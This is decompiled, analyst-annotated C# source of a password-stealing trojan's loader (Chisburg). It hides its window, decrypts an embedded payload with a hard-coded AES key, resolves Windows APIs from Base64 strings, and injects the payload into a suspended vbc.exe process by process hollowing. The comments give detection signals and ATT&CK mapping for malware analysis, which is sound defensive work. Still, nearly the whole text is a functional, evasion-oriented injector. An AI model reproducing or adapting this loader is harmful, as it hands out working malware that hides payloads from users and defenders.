// Decompiled with JetBrains decompiler
// Type: Program.Main
// Assembly: kripted, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F2186B1A-2E99-4A23-AA3D-671873E0755D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;
namespace Program
{
  /// <summary>
  /// Decompiled loader form. When the form loads it decrypts the embedded resource "glavni" with a
  /// hard-coded Rijndael key and IV, then passes the plaintext to the injection routine below, which
  /// writes it into a newly created, suspended process and redirects that process's main thread to it.
  /// This is the pattern commonly called process hollowing (MITRE ATT&amp;CK T1055.012).
  /// </summary>
  /// <remarks>
  /// Reading notes for analysts:
  /// - ProjectData, VBByRefStr and My.Resources indicate the binary was built from VB.NET. This C# text is
  ///   decompiler output and is not expected to compile as-is (a method named Main inside class Main, and
  ///   an unassigned local passed by value in the injection routine).
  /// - Every header offset and register index used below assumes a 32-bit PE image and the 32-bit
  ///   thread CONTEXT layout.
  /// - Behaviours visible in this listing that defenders can key on: Win32 API names stored as Base64
  ///   string literals and resolved at run time; a child process created suspended from a .NET Framework
  ///   compiler path with no arguments; a remote unmap followed by an executable+writable remote
  ///   allocation, remote writes, a thread-context change and a resume.
  /// - The key and IV are constants in the code, so the embedded resource can be decrypted offline for
  ///   analysis without running the sample.
  /// </remarks>
  public class Main : Form
  {
    // Designer container; never assigned in this listing, only null-checked in Dispose.
    private IContainer Components;
    // Assigned in the constructor and not read anywhere in this listing.
    private StringBuilder đžhuxHŠhBqYDXmćIi;

    /// <summary>Process entry point: runs the WinForms message loop on a new instance of this form.</summary>
    [STAThread]
    public static void Main() => Application.Run((Form) new Program.Main());

    /// <summary>
    /// Wires the Load handler and configures the form so that it is effectively invisible
    /// (1x1 client area, zero opacity, no taskbar button).
    /// </summary>
    public Main()
    {
      // All of the sample's work happens in Main_Load, triggered when the message loop shows the form.
      this.Load += new EventHandler(this.Main_Load);
      this.đžhuxHŠhBqYDXmćIi = new StringBuilder();
      Application.EnableVisualStyles();
      this.InitializeComponent();
      this.SuspendLayout();
      this.AutoScaleDimensions = new SizeF(6f, 13f);
      this.AutoScaleMode = AutoScaleMode.Font;
      // The next three settings hide the window from the user: 1x1 pixels, fully transparent, not in the taskbar.
      this.ClientSize = new Size(1, 1);
      this.Opacity = 0.0;
      this.ShowInTaskbar = false;
      this.Name = nameof (Main);
      this.Text = nameof (Main);
      this.ResumeLayout(false);
      this.PerformLayout();
    }

    /// <summary>Disposes the designer container (when present) and then the base form.</summary>
    /// <param name="Disposing">True when called from Dispose(), false when called from a finalizer.</param>
    protected override void Dispose(bool Disposing)
    {
      if (Disposing && this.Components != null)
        this.Components.Dispose();
      base.Dispose(Disposing);
    }

    /// <summary>Empty designer stub; the form has no child controls.</summary>
    [DebuggerStepThrough]
    private void InitializeComponent()
    {
    }

    /// <summary>
    /// Decrypts a buffer with Rijndael using the fixed 16-byte IV and 16-byte key below and returns the plaintext.
    /// </summary>
    /// <param name="NiwjwQĆNFSđZYšWnNw">Ciphertext; Main_Load passes the embedded resource "glavni".</param>
    /// <returns>The decrypted bytes produced by TransformFinalBlock over the whole input.</returns>
    /// <remarks>
    /// Mode and Padding are not set here, so the RijndaelManaged defaults apply (CBC with PKCS7 padding
    /// in the .NET Framework). The key bytes are the IV bytes in reverse order. Because both are
    /// constants, the resource can be decrypted statically during analysis.
    /// </remarks>
    public byte[] oBŠCJfŠIgbTTšNvribUA(byte[] NiwjwQĆNFSđZYšWnNw)
    {
      using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
      {
        // Hard-coded IV (16 bytes = one 128-bit block).
        rijndaelManaged.IV = new byte[16]
        {
          (byte) 5,
          (byte) 8,
          (byte) 8,
          (byte) 6,
          (byte) 7,
          (byte) 7,
          (byte) 3,
          (byte) 1,
          (byte) 5,
          (byte) 2,
          (byte) 5,
          (byte) 6,
          (byte) 4,
          (byte) 7,
          (byte) 3,
          (byte) 4
        };
        // Hard-coded 128-bit key: the IV above, reversed.
        rijndaelManaged.Key = new byte[16]
        {
          (byte) 4,
          (byte) 3,
          (byte) 7,
          (byte) 4,
          (byte) 6,
          (byte) 5,
          (byte) 2,
          (byte) 5,
          (byte) 1,
          (byte) 3,
          (byte) 7,
          (byte) 7,
          (byte) 6,
          (byte) 8,
          (byte) 8,
          (byte) 5
        };
        return rijndaelManaged.CreateDecryptor().TransformFinalBlock(NiwjwQĆNFSđZYšWnNw, 0, NiwjwQĆNFSđZYšWnNw.Length);
      }
    }

    // The only two APIs imported statically. Everything else is resolved through them at run time,
    // so the other API names do not appear as DllImport declarations in the assembly metadata.
    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
    public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string name);

    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
    public static extern IntPtr GetProcAddress(IntPtr handle, [MarshalAs(UnmanagedType.VBByRefStr)] ref string name);

    /// <summary>
    /// Loads library <paramref name="name"/>, looks up export <paramref name="method"/> and wraps the
    /// resulting function pointer in a delegate of type <typeparamref name="T"/>.
    /// </summary>
    /// <remarks>Neither the module handle nor the export address is checked for zero before use.</remarks>
    public T RđckvLgĐvXvrvosŠČK<T>(string name, string method) => (T) Marshal.GetDelegateForFunctionPointer(Program.Main.GetProcAddress(Program.Main.LoadLibraryA(ref name), ref method), typeof (T));

    /// <summary>
    /// Starts the executable at <paramref name="HwČećNđDAUctfmXzHOz"/> suspended, replaces its mapped image
    /// with the PE file in <paramref name="ZOkCiOcinđžXZđKuOk"/>, points the main thread at the new
    /// entry point and resumes it.
    /// </summary>
    /// <param name="ZOkCiOcinđžXZđKuOk">Raw bytes of a PE file; parsed with fixed 32-bit (PE32) header offsets.</param>
    /// <param name="HwČećNđDAUctfmXzHOz">Command line of the host process to create.</param>
    /// <returns>
    /// False only when an exception was thrown. True in every other case, including when process creation
    /// or a later step failed, so the return value does not indicate that injection succeeded.
    /// </returns>
    /// <remarks>
    /// The results of the remote writes and of the context update are discarded, the thread is resumed
    /// whenever process creation succeeded (even if hollowing was skipped), and the process and thread
    /// handles are never closed in this listing.
    /// </remarks>
    public bool bXwlfCFJQbtsuorRQbi(byte[] ZOkCiOcinđžXZđKuOk, string HwČećNđDAUctfmXzHOz)
    {
      // API names are stored Base64-encoded and resolved at run time. Decoded values are noted per line;
      // the encoded literals themselves are stable strings for static signatures.
      // "a2VybmVsMzI=" -> kernel32, "Q3JlYXRlUHJvY2Vzc0E=" -> CreateProcessA
      Program.Main.DQđlyZXQKUljwcsižj dqđlyZxqkUljwcsižj = this.RđckvLgĐvXvrvosŠČK<Program.Main.DQđlyZXQKUljwcsižj>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("Q3JlYXRlUHJvY2Vzc0E=")));
      // kernel32!GetThreadContext
      Program.Main.KćHŠććvBVeZFNTHhnV hšććvBveZfntHhnV = this.RđckvLgĐvXvrvosŠČK<Program.Main.KćHŠććvBVeZFNTHhnV>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("R2V0VGhyZWFkQ29udGV4dA==")));
      // kernel32!ReadProcessMemory
      Program.Main.fbođRGšŽcnČGpUycĐšĆ fbođRgšŽcnČgpUycĐšĆ = this.RđckvLgĐvXvrvosŠČK<Program.Main.fbođRGšŽcnČGpUycĐšĆ>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVhZFByb2Nlc3NNZW1vcnk=")));
      // kernel32!VirtualAllocEx
      Program.Main.DćgbvŽfweaihibVilWoB dćgbvŽfweaihibVilWoB = this.RđckvLgĐvXvrvosŠČK<Program.Main.DćgbvŽfweaihibVilWoB>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("VmlydHVhbEFsbG9jRXg=")));
      // kernel32!WriteProcessMemory
      Program.Main.yŽĐJlaškvrrkćlOgtq žđJlaškvrrkćlOgtq = this.RđckvLgĐvXvrvosŠČK<Program.Main.yŽĐJlaškvrrkćlOgtq>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("V3JpdGVQcm9jZXNzTWVtb3J5")));
      // kernel32!SetThreadContext
      Program.Main.ŠvlWžNWILiTčŠUUA švlWžNwiLiTčŠuua = this.RđckvLgĐvXvrvosŠČK<Program.Main.ŠvlWžNWILiTčŠUUA>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("U2V0VGhyZWFkQ29udGV4dA==")));
      // kernel32!ResumeThread
      Program.Main.ĆFnoPrdvŽĐPkđšwLGđm ćfnoPrdvŽđPkđšwLgđm = this.RđckvLgĐvXvrvosŠČK<Program.Main.ĆFnoPrdvŽĐPkđšwLGđm>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVzdW1lVGhyZWFk")));
      // "bnRkbGw=" -> ntdll, ntdll!ZwUnmapViewOfSection
      Program.Main.ŠĆJĐčAPHHCodtSuo šćjĐčAphhCodtSuo = this.RđckvLgĐvXvrvosŠČK<Program.Main.ŠĆJĐčAPHHCodtSuo>(Encoding.UTF8.GetString(Convert.FromBase64String("bnRkbGw=")), Encoding.UTF8.GetString(Convert.FromBase64String("WndVbm1hcFZpZXdPZlNlY3Rpb24=")));
      bool flag;
      try
      {
        IntPtr zero1 = IntPtr.Zero;
        // Receives PROCESS_INFORMATION as four pointer-sized slots: [0] process handle, [1] thread handle.
        IntPtr[] pĐUfJxXošTsYUQdVGx = new IntPtr[4];
        // Zero-filled 68-byte buffer passed as STARTUPINFO (68 is the 32-bit structure size).
        byte[] yDoemFćaqJkćčIWLkh = new byte[68];
        // Offset 60 (0x3C) of the DOS header holds e_lfanew, the file offset of the PE header.
        int int32_1 = BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, 60);
        // PE header + 6: NumberOfSections.
        int int16 = (int) BitConverter.ToInt16(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 6));
        // PE header + 84: SizeOfHeaders (PE32 optional header).
        IntPtr xDhpđBqŠIbJnLqEB = new IntPtr(BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 84)));
        // Creation flag 4 is CREATE_SUSPENDED: the host process exists but its main thread has not run yet.
        if (dqđlyZxqkUljwcsižj((string) null, new StringBuilder(HwČećNđDAUctfmXzHOz), zero1, zero1, false, 4, zero1, (string) null, yDoemFćaqJkćčIWLkh, pĐUfJxXošTsYUQdVGx))
        {
          // 179 DWORDs = 716 bytes, the size of the 32-bit CONTEXT structure.
          uint[] numArray1 = new uint[179];
          // ContextFlags = 0x10002 (CONTEXT_INTEGER on x86): request the general-purpose registers.
          numArray1[0] = 65538U;
          if (hšććvBveZfntHhnV(pĐUfJxXošTsYUQdVGx[1], numArray1))
          {
            // Index 41 is Ebx in the 32-bit CONTEXT layout; the code treats Ebx + 8 as the address of the
            // image-base field of the suspended process (PEB + 8 on x86).
            IntPtr lHYtcldUušXrccECW = new IntPtr(checked ((long) numArray1[41] + 8L));
            IntPtr zero2 = IntPtr.Zero;
            IntPtr žEdXtvpRfDeJABydđZz = new IntPtr(4);
            IntPtr zero3 = IntPtr.Zero;
            // Read the host's current image base (4 bytes), then unmap the image mapped there.
            // ZwUnmapViewOfSection returning 0 means STATUS_SUCCESS.
            if (fbođRgšŽcnČgpUycĐšĆ(pĐUfJxXošTsYUQdVGx[0], lHYtcldUušXrccECW, ref zero2, (int) žEdXtvpRfDeJABydđZz, ref zero3) && šćjĐčAphhCodtSuo(pĐUfJxXošTsYUQdVGx[0], zero2) == 0U)
            {
              // PE header + 52: ImageBase; PE header + 80: SizeOfImage (PE32 optional header).
              IntPtr num1 = new IntPtr(BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 52)));
              IntPtr num2 = new IntPtr(BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 80)));
              // 12288 = 0x3000 (MEM_COMMIT | MEM_RESERVE); 64 = 0x40 (PAGE_EXECUTE_READWRITE).
              // A remote RWX allocation at a fixed preferred base is a strong behavioural signal.
              // The returned address is not checked for zero before it is used.
              IntPtr ŽACĐbXomGGšŠAVyLčUć = dćgbvŽfweaihibVilWoB(pĐUfJxXošTsYUQdVGx[0], num1, num2, 12288, 64);
              int int32_2 = ŽACĐbXomGGšŠAVyLčUć.ToInt32();
              // Never assigned before use (decompiler artifact). NOTE(review): in VB an unassigned Integer
              // is 0, so presumably zero is passed as the last WriteProcessMemory argument - confirm in IL.
              int čePWVČDEEĐrEBwPNTHUs;
              // Copy the PE headers (SizeOfHeaders bytes) to the start of the remote allocation.
              int num3 = žđJlaškvrrkćlOgtq(pĐUfJxXošTsYUQdVGx[0], ŽACĐbXomGGšŠAVyLčUć, ZOkCiOcinđžXZđKuOk, checked ((uint) (int) xDhpđBqŠIbJnLqEB), čePWVČDEEĐrEBwPNTHUs) ? 1 : 0;
              int num4 = checked (int16 - 1);
              int num5 = 0;
              // One iteration per section-table entry.
              while (num5 <= num4)
              {
                // A section header is 40 bytes, read here as ten ints. The table is assumed to start at
                // PE header + 248 (24-byte signature/file header + 224-byte PE32 optional header).
                int[] dst = new int[10];
                Buffer.BlockCopy((Array) ZOkCiOcinđžXZđKuOk, checked (int32_1 + 248 + num5 * 40), (Array) dst, 0, 40);
                // dst[4] = SizeOfRawData, dst[5] = PointerToRawData, dst[3] = VirtualAddress.
                // The "- 1 + 1" is a VB array-bound artifact; the buffer is SizeOfRawData bytes long.
                byte[] numArray2 = new byte[checked (dst[4] - 1 + 1)];
                Buffer.BlockCopy((Array) ZOkCiOcinđžXZđKuOk, dst[5], (Array) numArray2, 0, numArray2.Length);
                num2 = new IntPtr(checked (int32_2 + dst[3]));
                num1 = new IntPtr(numArray2.Length);
                // Write the section's raw bytes at remote base + VirtualAddress.
                int num6 = žđJlaškvrrkćlOgtq(pĐUfJxXošTsYUQdVGx[0], num2, numArray2, checked ((uint) (int) num1), čePWVČDEEĐrEBwPNTHUs) ? 1 : 0;
                checked { ++num5; }
              }
              // Overwrite the 4-byte image-base field read earlier (Ebx + 8) with the new allocation address.
              num2 = new IntPtr(checked ((long) numArray1[41] + 8L));
              num1 = new IntPtr(4);
              int num7 = žđJlaškvrrkćlOgtq(pĐUfJxXošTsYUQdVGx[0], num2, BitConverter.GetBytes(ŽACĐbXomGGšŠAVyLčUć.ToInt32()), checked ((uint) (int) num1), čePWVČDEEĐrEBwPNTHUs) ? 1 : 0;
              // Index 44 is Eax in the 32-bit CONTEXT layout; it is set to remote base + AddressOfEntryPoint
              // (PE header + 40) so the resumed thread starts in the written image.
              numArray1[44] = checked ((uint) (ŽACĐbXomGGšŠAVyLčUć.ToInt32() + BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, int32_1 + 40)));
              int num8 = švlWžNwiLiTčŠuua(pĐUfJxXošTsYUQdVGx[1], numArray1) ? 1 : 0;
            }
          }
          // Runs whenever process creation succeeded, whether or not the image was replaced.
          int num = (int) ćfnoPrdvŽđPkđšwLgđm(pĐUfJxXošTsYUQdVGx[1]);
        }
      }
      catch (Exception ex)
      {
        // VB.NET compiler-generated error bookkeeping; every exception is swallowed and reported as false.
        ProjectData.SetProjectError(ex);
        flag = false;
        ProjectData.ClearProjectError();
        goto label_11;
      }
      flag = true;
label_11:
      return flag;
    }

    /// <summary>
    /// Load handler: decrypts the embedded resource "glavni", runs the injection routine against the
    /// .NET Framework 2.0 Visual Basic compiler, then closes the form (which ends the message loop).
    /// </summary>
    private void Main_Load(object sender, EventArgs e)
    {
      // Result is discarded; the resource is read again through the typed accessor on the next line.
      RuntimeHelpers.GetObjectValue(My.Resources.Resources.ResourceManager.GetObject("glavni"));
      // The Base64 literal decodes to C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, the host
      // process. vbc.exe launched with no arguments by a non-build parent is worth alerting on.
      this.bXwlfCFJQbtsuorRQbi(this.oBŠCJfŠIgbTTšNvribUA(My.Resources.Resources.glavni), Encoding.UTF8.GetString(Convert.FromBase64String("QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2Mi4wLjUwNzI3XHZiYy5leGU=")));
      this.Close();
    }

    // Delegate types for the run-time-resolved exports. Names are obfuscated; the export each one is
    // bound to is taken from the resolver calls at the top of the injection routine.

    /// <summary>Bound to kernel32!CreateProcessA; the last two parameters are raw STARTUPINFO and PROCESS_INFORMATION buffers.</summary>
    [return: MarshalAs(UnmanagedType.Bool)]
    public delegate bool DQđlyZXQKUljwcsižj(
      string čuxXhččVĐćLVmnĐšbwu,
      StringBuilder edbBlGCđplćZwQcrUĆOI,
      IntPtr ZešwZPIyvHvČoZSIvPbh,
      IntPtr JvNšXNeORĆabqvgj,
      [MarshalAs(UnmanagedType.Bool)] bool PšgJŽvLFAYRxštšfXJZš,
      int PPTČSttjioRfnqhNktqč,
      IntPtr etbčaPćotOĆiuNmĆe,
      string sĐRLLqtŠrSfPĆTCQUZiQ,
      byte[] yDoemFćaqJkćčIWLkh,
      IntPtr[] pĐUfJxXošTsYUQdVGx);

    /// <summary>Bound to kernel32!WriteProcessMemory; the final argument is declared as a plain int passed by value.</summary>
    public delegate bool yŽĐJlaškvrrkćlOgtq(
      IntPtr ĐlwXQfNHBwoŠRTDEŽačw,
      IntPtr ŽACĐbXomGGšŠAVyLčUć,
      byte[] ŠFOAwCVyIjjnIfNszč,
      uint xDhpđBqŠIbJnLqEB,
      int čePWVČDEEĐrEBwPNTHUs);

    /// <summary>Bound to kernel32!ReadProcessMemory; the output buffer is a single pointer-sized value.</summary>
    [return: MarshalAs(UnmanagedType.Bool)]
    public delegate bool fbođRGšŽcnČGpUycĐšĆ(
      IntPtr pQkBZjĐEfmajnfFmXpz,
      IntPtr lHYtcldUušXrccECW,
      ref IntPtr JAŽšjKhuhXmEvtpgad,
      int žEdXtvpRfDeJABydđZz,
      ref IntPtr iLgVciRŽDAuežfgVvB);

    /// <summary>Bound to kernel32!VirtualAllocEx.</summary>
    public delegate IntPtr DćgbvŽfweaihibVilWoB(
      IntPtr ĐmWmčWeAZHČČCvEPoĐšv,
      IntPtr LRQdkćŽJĐFĆhQŠcčZbKn,
      IntPtr rfšOKXhžUsgćVCXw,
      int VggzYBwvcLixWćyV,
      int ĐčfŽmhxZzbytRČmćvmv);

    /// <summary>Bound to ntdll!ZwUnmapViewOfSection; returns an NTSTATUS value.</summary>
    public delegate uint ŠĆJĐčAPHHCodtSuo(IntPtr RkĆBxđLGeUVpEšgrzĐ, IntPtr HnyšxĆUjĐyKlfračlI);

    /// <summary>Bound to kernel32!ResumeThread.</summary>
    public delegate uint ĆFnoPrdvŽĐPkđšwLGđm(IntPtr ĆožBčliZRrŽBŽhGnvćy);

    /// <summary>Bound to kernel32!GetThreadContext; the CONTEXT structure is passed as a raw uint array.</summary>
    [return: MarshalAs(UnmanagedType.Bool)]
    public delegate bool KćHŠććvBVeZFNTHhnV(IntPtr kpFhettcmCyČfjOdJJQ, uint[] IRĐeHIAPŽAPŽdRehh);

    /// <summary>Bound to kernel32!SetThreadContext; the CONTEXT structure is passed as a raw uint array.</summary>
    [return: MarshalAs(UnmanagedType.Bool)]
    public delegate bool ŠvlWžNWILiTčŠUUA(IntPtr VScŽcČqZRPvYćBdaXK, uint[] ĐhQNPoXaĆsDDČrmP);
  }
}